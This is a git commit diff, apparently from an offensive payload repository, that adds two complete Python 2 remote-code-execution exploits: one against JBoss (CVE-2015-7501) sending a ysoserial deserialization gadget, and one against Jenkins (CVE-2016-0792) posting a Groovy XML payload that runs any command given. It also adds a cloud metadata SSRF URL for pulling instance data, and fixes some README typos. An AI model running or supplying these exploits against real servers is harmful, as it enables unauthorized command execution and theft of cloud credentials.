More CVE - RCE : Jenkins, JBoss, WebLogic, WebSphere

2024-05-21 07:06:07 +02:00 · 2018-11-15 23:13:08 +01:00 · 2018-11-15 23:13:08 +01:00 · af9abc6592
parent 15fe34052b
commit af9abc6592
7 changed files with 383 additions and 1 deletions
--- a/CVE-2015-7501.py
+++ b/CVE-2015-7501.py
@ -0,0 +1,61 @@
+#! /usr/bin/env python2
+
+# Jboss Java Deserialization RCE (CVE-2015-7501)
+# Made with <3 by @byt3bl33d3r
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys, os
+#from binascii import hexlify, unhexlify
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+    for path in ysoserial_default_paths:
+        if os.path.exists(path):
+            ysoserial_path = path
+else:
+    if os.path.exists(args.ysoserial_path):
+        ysoserial_path = args.ysoserial_path
+
+if ysoserial_path is None:
+    print '[-] Could not find ysoserial JAR file'
+    sys.exit(1)
+
+if len(args.target.split(":")) != 2:
+    print '[-] Target must be in format IP:PORT'
+    sys.exit(1)
+
+if not args.command:
+    print '[-] You must specify a command to run'
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print '[*] Target IP: {}'.format(ip)
+print '[*] Target PORT: {}'.format(port)
+
+gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
+
+r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
+
+if r.status_code == 200:
+    print '[+] Command executed successfully'
+
--- a/CVE-2015-8103.py
+++ b/CVE-2015-8103.py
--- a/CVE-2016-0792.py
+++ b/CVE-2016-0792.py
@ -0,0 +1,83 @@
+#! /usr/bin/env python2
+
+#Jenkins Groovy XML RCE (CVE-2016-0792)
+#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
+#Made with <3 by @byt3bl33d3r
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if len(args.target.split(':')) != 2:
+    print '[-] Target must be in format IP:PORT'
+    sys.exit(1)
+
+if not args.command:
+    print '[-] You must specify a command to run'
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print '[*] Target IP: {}'.format(ip)
+print '[*] Target PORT: {}'.format(port)
+
+xml_formatted = ''
+command_list = args.command.split()
+for cmd in command_list:
+    xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
+
+xml_payload = '''<map>
+  <entry>
+    <groovy.util.Expando>
+      <expandoProperties>
+        <entry>
+          <string>hashCode</string>
+          <org.codehaus.groovy.runtime.MethodClosure>
+            <delegate class="groovy.util.Expando" reference="../../../.."/>
+            <owner class="java.lang.ProcessBuilder">
+              <command>
+                {}
+              </command>
+              <redirectErrorStream>false</redirectErrorStream>
+            </owner>
+            <resolveStrategy>0</resolveStrategy>
+            <directive>0</directive>
+            <parameterTypes/>
+            <maximumNumberOfParameters>0</maximumNumberOfParameters>
+            <method>start</method>
+          </org.codehaus.groovy.runtime.MethodClosure>
+        </entry>
+      </expandoProperties>
+    </groovy.util.Expando>
+   <int>1</int>
+ </entry>
+</map>'''.format(xml_formatted.strip())
+
+print '[*] Generated XML payload:'
+print xml_payload
+print 
+
+print '[*] Sending payload'
+headers = {'Content-Type': 'text/xml'}
+r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
+
+paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
+if r.status_code == 500:
+    for path in paths_in_trace:
+        if path in r.text:
+            print '[+] Command executed successfully'
+            break
--- a/Exploits/WebLogic
+++ b/Exploits/WebLogic
--- a/Exploits/WebSphere
+++ b/Exploits/WebSphere
--- a/injection/README.md
+++ b/injection/README.md
@ -350,6 +350,7 @@ Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)

 ```powershell
 http://metadata.google.internal/computeMetadata/v1beta1/
+http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```

 ### SSRF URL for Digital Ocean
--- a/injection/README.md
+++ b/injection/README.md
@ -9,7 +9,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
 - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
 - [Polyglot XSS](#polyglot-xss)
 - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [CSP Bypas](#csp-bypass)
+- [CSP Bypass](#csp-bypass)
 - [Common WAF Bypas](#common-waf-bypass)

 ## Exploit code or POC
@ -827,3 +827,4 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
 - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
 - [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)
 - [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
+- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)